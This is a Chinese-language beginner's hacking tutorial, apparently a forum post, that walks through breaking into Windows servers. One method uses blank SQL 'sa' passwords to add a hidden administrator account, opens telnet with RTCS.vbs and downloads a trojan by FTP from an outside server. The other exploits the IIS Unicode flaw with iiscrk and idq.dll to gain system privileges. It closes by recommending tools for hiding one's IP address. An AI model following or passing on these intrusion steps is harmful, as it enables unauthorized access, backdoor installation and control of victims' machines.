|
|
菜鸟常用详细教程
|
|
|
| |
3.sa空口令。这时又要用到流光了,点击“探测-扫描POP3/FTP/NT/SQL主机”,扫描主机类型设为SQL,把“将FrontPage主机自动加入HTTP列表”去掉。扫描结果出来了之后,用鼠标左键单击某一个结果,点两下“连接”就会出现一个方框,“Type Command at Prompt”提示符是SQLCMD>。打入一个命令“net user 要创建的用户名 密码 /add”(这是创建一个用户),再打一个“net localgroup administrators 刚创建的用户名 /add”(把创建的用户加到administrators组)。创建了用户当然是用流光种植者上传后门啦,填入资料,点确定,但却提示上传文件失败,再检查一下IP,用户名,密码,并没有错啊。咚咚~~~告诉你们吧,这是因为对方删除了IPC$,种植者需要IPC连接,你当然上传不了文件啦。这时候就要动用另一种工具,它的特点是:不依赖于目标的ipc$开放与否远程开启/关闭目标telnet服务,这就是“rtcs.vbs”。在cmd输入:“cscript RTCS.vbs 目标IP 用户名 密码 NTLM验证方式 telnet服务端口”,当出现“to get a shelll”时就表示成功了,你就可以“telnet IP 服务端口”了,简单吧!!如果你想上传木马,也很简单,只要登陆ftp服务器(要有你要下载的木马服务端)。这些可以找网上的肉机,弱密码的实在太多了,或用自己部机做服务器也可以,后面我会详细介绍。telnet上对方,输入“ftp ftp服务器IP”用户名密码进入,“get 木马服务端”就下载来了。“bye”退出ftp,输入木马文件名回车就运行了,以后你就可以用木马控制他了。
4.U漏洞。这种漏洞现在虽然很少,但还是可以比较轻松的扫描到,用这种方法黑网站确实很轻松。但我们这次说的并不是如何黑网站,而是如何取得管理员权限。首先,启动流光,选择“探测--扫描POP3/FTP/NT/SQL主机”,“扫描主机类型”为NT/98。等一段时间(看你扫描IP多少来看)扫描完成后。如果你能在中间的方框里看到黑色的小电脑,就说明你已经得到了存在U漏洞的主机了。双击iiscrk(小金的作品),在“当前连接”处添上刚才扫描得到的主机,其他设置一般默认行了,不行,换其他方式试试。点击左边第一个图标连接IIS主机,如果成功,你就会在最下边的方框看到对方主机目录。要当心啊,具有删读的权限,不要乱破坏(警告)。好,现在开始真正工作了。单击左数第六个图标“tftp”,如何做我就不多说了,里面说得明明白白。不过,要上传什么文件我还是要说的,这个就是iiscrk自带的idq.dll,把它上传到cripts目录,成功后。在cmd输入“ispc 对方IP/scripts/idq.dll ”(ISPC每次执行一个命令要打3次回车)。成功登陆到对方后,你就有了system权限。用我上面提到的方法创建用户并加他到administrators组。我要补充的是,一般你连接上去时出现的目录都是可执行目录,文件可放在里面。
本来我打算写多几种方法的,但没有什么时间,现在我连打开电脑的时间都受到了限制(痛苦ing)。因为这次期中考考得实在是#¥#!!唉~~~,有一科还是老师好心,送我几分我才及格(太惭愧了)。看来要以后啦。。
上面提到的软件如果本站没有下载,www.google.com搜索。
推荐几个不错的东东,适合菜鸟(我也经常用):
DameWare Mini Remote Control(远程桌面控制)
Loader(我主要是用它来改QQ端口,因为我经常用代理啊)
BlackICE PC Protection(防火墙)
MsgSend(发信息用)
QQ代理(不用我说,你们肯定知道是干嘛的)
ttyip(隐藏自己在论坛、留言本、计数器、WEB聊天室、网页的真实IP)
|
|
|
|
|
|
